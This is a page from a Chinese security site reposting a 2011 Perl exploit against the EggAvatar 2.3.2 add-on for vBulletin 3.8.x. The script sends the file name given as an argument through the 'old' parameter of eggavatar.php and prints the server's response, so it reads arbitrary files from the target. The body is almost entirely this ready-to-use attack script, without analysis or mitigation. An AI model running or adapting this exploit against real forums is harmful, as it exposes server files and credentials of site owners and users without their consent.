首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EggAvatar 2.3.2 for vBulletin 3.8.x Local File Read
来源:dsecurity.vn[at]gmail.com 作者:DSecurity 发布时间:2011-03-08  

#!/usr/bin/env perl
use LWP::UserAgent;
sub banner{
print "###################################\n";
print "############ DSecurity ############\n";
print "###################################\n";
print "# Email:dsecurity.vn[at]gmail.com #\n";
print "###################################\n";
}
if(@ARGV<2){
 print "Usage: $0 address filename\n";
 print "Example: $0 http://localhost/vbb test test index.php\n";
 exit();
}
$ua=LWP::UserAgent->new();
$ua->agent("DSecurity");

&banner;
print "\n#############################################################################################################\n";
print "# EggAvatar for vBulletin 3.8.x local file read                                                   #\n";
print "# Date:07-03-2011                                                                                           #\n";
print "# Author: DSecurity                                                         #\n";
print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print "# Version: 2.3.2                                                                                            #\n";
print "# Tested on: vBulletin 3.8.0                                                                                #\n";
print "#############################################################################################################\n";


#Get info
my $response = $ua->get($ARGV[0].'/eggavatar.php?eggavatar.php?do=showeggs&u=1&old='.$ARGV[1]);
 
 if ($response->is_success) {
     print $response->decoded_content;  # or whatever
}
 else {
     die $response->status_line;
 }


 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KingView 6.5.3 SCADA ActiveX E
·Hiawatha WebServer 7.4 Denial
·Bacula-web 1.3.x - 5.0.3 Multi
·.NET Runtime Optimization Serv
·Weborf 0.12.4 Denial Of Servic
·Movavi VideoSuite 8.0 MediaPla
·Movavi VideoSuite 8.0 SlideSho
·Movavi VideoSuite 8.0 Movie Ed
·Interphoto 2.4.2 Local File In
·Nokia N97 m3u Playlist Crash P
·Automne 4.1.0 Race Condition
·maian weblog <= v4.0 remote bl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved